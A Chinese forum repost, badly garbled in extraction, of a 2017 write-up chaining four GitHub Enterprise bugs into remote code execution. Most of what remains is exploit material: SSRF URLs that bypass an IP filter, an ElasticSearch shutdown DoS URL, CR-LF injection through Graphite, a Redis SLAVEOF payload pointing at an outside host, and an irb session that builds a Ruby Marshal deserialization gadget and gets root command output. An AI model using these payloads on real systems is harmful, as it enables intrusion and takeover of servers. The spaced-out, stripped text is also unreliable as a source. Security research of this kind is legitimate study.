搜索

[20850] 2017-08-10_综合利用4个漏洞实现GitHubEnterprise远程代码执行

文档创建者:s7ckTeam
浏览次数:5
最后更新:2025-01-18
2017-08-10_综合利用4个漏洞实现GitHubEnterprise远程代码执行 4 G i t H u b   E n t e r p r i s e L e m o n S e c   2 0 1 7 - 0 8 - 1 0 1     S S R F G i t H u b   E n t e r p r i s e W e b H o o k G I T H T T P U R L h t t p s : / / < h o s t > / < u s e r > / < r e p o > / s e t t i n g s / h o o k s / n e w G i t H u b   E n t e r p r i s e H T T P P a y l o a d P a y l o a d   U R L : h t t p : / / o r a n g e . t w / f o o . p h p C a l l b a c k   R e q u e s t G i t H u b   E n t e r p r i s e 使 R u b y   G e m f a r a d a y G e m f a r a d a y - r e s t r i c t - i p - a d d r e s s e s G e m R F C 3 9 8 6 I P R a r e   I P   A d d r e s s   F o r m a t s L i n u x 0 l o c a l h o s t P o C h t t p : / / 0 / O K S S R F S S R F P O S T H T T P H T T P S 3 0 2 f a r a d a y C R - L F P O S T H T T P P a t h S S R F D o S G i t H u b   E n t e r p r i s e 9 2 0 0 E l a s t i c S e a r c h 使 E l a s t i c S e a r c h P O S T R E S T - f u l   A P I D o S P o C h t t p : / / 0 : 9 2 0 0 / _ s h u t d o w n / 2     G r a p h i t e S S R F 1 S S R F H T T P C C + + G o P y t h o n R u b y 8 0 0 0 G r a p h i t e P y t h o n G r a p h i t e S S R F w e b a p p s / g r a p h i t e / c o m p o s e r / v i e w s . p y G r a p h i t e u r l 1 S S R F 2 S S R F S S R F S S R F P a y l o a d S S R F O K P O S T S S R F G E T S S R F ! 3     P y t h o n C R - L F G r a p h i t e G r a p h i t e 使 P y t h o n h t t p l i b . H T T P C o n n e c t i o n h t t p l i b . H T T P C o n n e c t i o n C R - L F H T T P P a y l o a d C R - L F P o C S S R F R e d i s 使 P a y l o a d P O S T   / f o o . p h p   H T T P / 1 . 1 H o s t :   o r a n g e . t w A c c e p t :   * / * U s e r - A g e n t :   G i t H u b - H o o k s h o t / 5 4 6 5 1 a c X - G i t H u b - E v e n t :   p i n g X - G i t H u b - D e l i v e r y :   f 4 c 4 1 9 8 0 - e 1 7 e - 1 1 e 6 - 8 a 1 0 - c 8 1 5 8 6 3 1 7 2 8 f c o n t e n t - t y p e :   a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d C o n t e n t - L e n g t h :   8 9 7 2 p a y l o a d = . . . d e f   s e n d _ e m a i l ( r e q u e s t ) :         t r y :                 r e c i p i e n t s   =   r e q u e s t . G E T [ ' t o ' ] . s p l i t ( ' , ' )                 u r l   =   r e q u e s t . G E T [ ' u r l ' ]                 p r o t o ,   s e r v e r ,   p a t h ,   q u e r y ,   f r a g   =   u r l s p l i t ( u r l )                 i f   q u e r y :   p a t h   + =   ' ? '   +   q u e r y                 c o n n   =   H T T P C o n n e c t i o n ( s e r v e r )                 c o n n . r e q u e s t ( ' G E T ' , p a t h )                 r e s p   =   c o n n . g e t r e s p o n s e ( )                 . . . h t t p : / / 0 : 8 0 0 0 / c o m p o s e r / s e n d _ e m a i l ? t o = o r a n g e @ n o g g & u r l = h t t p : / / o r a n g e . t w : 1 2 3 4 5 / f o o $   n c   - v v l p   1 2 3 4 5 . . . G E T   / f o o   H T T P / 1 . 1 H o s t :   o r a n g e . t w : 1 2 3 4 5 A c c e p t - E n c o d i n g :   i d e n t i t y h t t p : / / 0 : 8 0 0 0 / c o m p o s e r / s e n d _ e m a i l ? t o = o r a n g e @ n o g g & u r l = h t t p : / / 1 2 7 . 0 . 0 . 1 : 1 2 3 4 5 / % 0 D % 0 A i _ a m _ p a y l o a d % 0 D % 0 A F o o : $   n c   - v v l p   1 2 3 4 5 . . . G E T   / i _ a m _ p a y l o a d F o o :   H T T P / 1 . 1 H o s t :   1 2 7 . 0 . 0 . 1 : 1 2 3 4 5 A c c e p t - E n c o d i n g :   i d e n t i t y h t t p : / / 0 : 8 0 0 0 / c o m p o s e r / s e n d _ e m a i l ?
R e d i s S L A V E O F B l i n d - S S R F S S H M y S Q L S S L P y t h o n 2 2 S S R F 使 P a y l o a d 0 × 0 0 0 x 8 F 便 H T T P L i n u x   G l i b c S S L   S N I C V E - 2 0 1 6 - 5 6 9 9 P y t h o n B l a c k H a t P P T 4     R e d i s M e m c a c h e d G i t H u b M e m c a c h e d R u b y G i t H u b   E n t e r p r i s e 使 R u b y   G e m M e m c a c h e d M a r s h a l M a r s h a l 使 S S R F R u b y M e m c a c h e d G i t H u b R u b y   G e m   m e m c a c h e d G i t H u b   E n t e r p r i s e   R a i l s M a r s h a l 1 S S R F W e b H o o k 2 S S R F G r a p h i t e 1 2 S S R F S S R F S S R F C R - L F M e m c a c h e d M a r s h a l M a r s h a l P o C G i t H u b G e m f a r a d a y - r e s t r i c t - i p - a d d r e s s e s D j a n g o 访 h t t p : / / 1 2 7 . 0 . 0 . 1 : 8 0 0 0 / r e n d e r / i p t a b l e s U s e r - A g e n t :   G i t H u b - H o o k s h o t 访 h t t p : / / 0 : 8 0 0 0 / c o m p o s e r / s e n d _ e m a i l ? t o = o r a n g e @ n o g g & u r l = h t t p : / / 1 2 7 . 0 . 0 . 1 : 6 3 7 9 / % 0 A S L A V E O F % 2 0 o r a n g e . t w % 2 0 6 3 7 9 % 0 A i r b ( m a i n ) : 0 0 1 : 0 >   G i t H u b . c a c h e . c l a s s . s u p e r c l a s s = >   M e m c a c h e d : : R a i l s i r b ( m a i n ) : 0 0 2 : 0 >   G i t H u b . c a c h e . s e t ( " n o g g " ,   " h i h i h i " ) = >   t r u e i r b ( m a i n ) : 0 0 3 : 0 >   G i t H u b . c a c h e . g e t ( " n o g g " ) = >   " h i h i h i " i r b ( m a i n ) : 0 0 4 : 0 >   G i t H u b . c a c h e . g e t ( " n o g g " ,   : r a w = > t r u e ) = >   " x 0 4 b I " v h i h i h i x 0 6 : x 0 6 E T " i r b ( m a i n ) : 0 0 5 : 0 >   c o d e   =   " ` i d ` " = >   " ` i d ` " i r b ( m a i n ) : 0 0 6 : 0 >   p a y l o a d   =   " x 0 4 x 0 8 "   +   " o " + " : x 4 0 A c t i v e S u p p o r t : : D e p r e c a t i o n : : D e p r e c a t e d I n s t a n c e V a r i a b l e P r o x y " + " x 0 7 "   +   " : x 0 E @ i n s t a n c e "   +   " o " + " : x 0 8 E R B " + " x 0 7 "   +   " : x 0 9 @ s r c "   +   M a r s h a l . d u m p ( c o d e ) [ 2 . . - 1 ]   +   " : x 0 c @ l i n e n o " +   " i x 0 0 "   +   " : x 0 C @ m e t h o d " + " : x 0 B r e s u l t " = >   " u 0 0 0 4 b o : @ A c t i v e S u p p o r t : : D e p r e c a t i o n : : D e p r e c a t e d I n s t a n c e V a r i a b l e P r o x y a : u 0 0 0 E @ i n s t a n c e o : b E R B a : t @ s r c I " t ` i d ` u 0 0 0 6 : u 0 0 0 6 E T : f @ l i n e n o i u 0 0 0 0 : f @ m e t h o d : v r e s u l t " i r b ( m a i n ) : 0 0 7 : 0 >   G i t H u b . c a c h e . s e t ( " n o g g " ,   p a y l o a d ,   6 0 ,   : r a w = > t r u e ) = >   t r u e i r b ( m a i n ) : 0 0 8 : 0 >   G i t H u b . c a c h e . g e t ( " n o g g " ) = >   " u i d = 0 ( r o o t )   g i d = 0 ( r o o t )   g r o u p s = 0 ( r o o t ) n "
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理